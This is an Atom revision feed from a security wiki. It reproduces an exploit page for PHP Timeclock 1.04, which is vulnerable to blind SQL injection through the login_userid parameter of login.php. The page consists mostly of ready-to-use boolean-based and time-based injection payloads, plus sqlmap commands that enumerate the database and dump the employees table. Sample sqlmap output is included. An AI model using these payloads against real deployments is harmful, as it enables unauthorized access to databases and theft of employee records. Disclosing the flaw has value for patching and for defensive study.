https://pwnwiki.com/index.php?action=history&feed=atom&title=PHP_Timeclock_1.04_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E PHP Timeclock 1.04 SQL注入漏洞 - Revision history 2026-04-13T20:11:05Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=PHP_Timeclock_1.04_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&diff=2728&oldid=prev Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: PHP Timeclock 1.04 - Time and Boolean Based Blind SQL Injection # Date: 03.05.2021 # Exploit Author: Tyler Butler # Vendor Homepage: http://time..." 2021-05-08T02:07:05Z <p>Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: PHP Timeclock 1.04 - Time and Boolean Based Blind SQL Injection # Date: 03.05.2021 # Exploit Author: Tyler Butler # Vendor Homepage: http://time...&quot;</p> <p><b>New page</b></p><div>==EXP==<br /> &lt;pre&gt;<br /> # Exploit Title: PHP Timeclock 1.04 - Time and Boolean Based Blind SQL Injection<br /> # Date: 03.05.2021<br /> # Exploit Author: Tyler Butler<br /> # Vendor Homepage: http://timeclock.sourceforge.net<br /> # Software Link: https://sourceforge.net/projects/timeclock/files/PHP%20Timeclock/PHP%20Timeclock%201.04/<br /> # Version: 1.04<br /> # Tested on: PHP 4.4.9/5.3.3 Apache 2.2 MySql 4.1.22/5<br /> <br /> <br /> Description: PHP Timeclock is vulnerable to both Boolean and Time Based SQL Injection on login.php via the login_userid parameter. This PoC shows how SQLmap can be used to exploit this vulnerability to dump database contents<br /> <br /> Boolean Based Payload: user' RLIKE (SELECT (CASE WHEN (8535=8535) THEN 0x75736572 ELSE 0x28 END))-- QwMo&amp;login_password=pass<br /> Time Based Payload: user' AND (SELECT 4247 FROM (SELECT(SLEEP(5)))ztHm) AND 'WHmv'='WHmv&amp;login_password=pass<br /> <br /> <br /> Steps to reproduce:<br /> 1. Run sqlmap against a instance of PHP Timeclock<br /> 2. Follow the instructions below for specific versions of MySQL<br /> <br /> <br /> MySQL &gt;= 5.0.12: <br /> <br /> $ sqlmap -u http://localhost/login.php --method POST --data &quot;login_userid=user&amp;login_password=pass&quot; -p login_userid --not-string=&quot;Warning&quot; --dbms=MySQL --technique=TB --current-db<br /> ---<br /> Parameter: login_userid (POST)<br /> Type: time-based blind<br /> Title: MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: login_userid=user' AND (SELECT 4247 FROM (SELECT(SLEEP(5)))ztHm) AND 'WHmv'='WHmv&amp;login_password=pass<br /> ---<br /> <br /> <br /> MySQL &lt; 5: On versions using MySQL &lt; 5, table names must be included as arguments as information_schema was not introduced into MySQL yet.<br /> <br /> $ sqlmap -u http://localhost/login.php --method POST --data &quot;login_userid=user&amp;login_password=pass&quot; -p login_userid --not-string=&quot;Warning&quot; --technique=B -D timeclock -T employees, -C empfullname --dump --dbms=MySQL -v <br /> ---<br /> Parameter: login_userid (POST)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause<br /> Payload: login_userid=user' RLIKE (SELECT (CASE WHEN (8535=8535) THEN 0x75736572 ELSE 0x28 END))-- QwMo&amp;login_password=pass<br /> ---<br /> <br /> &lt;/pre&gt;</div> Pwnwiki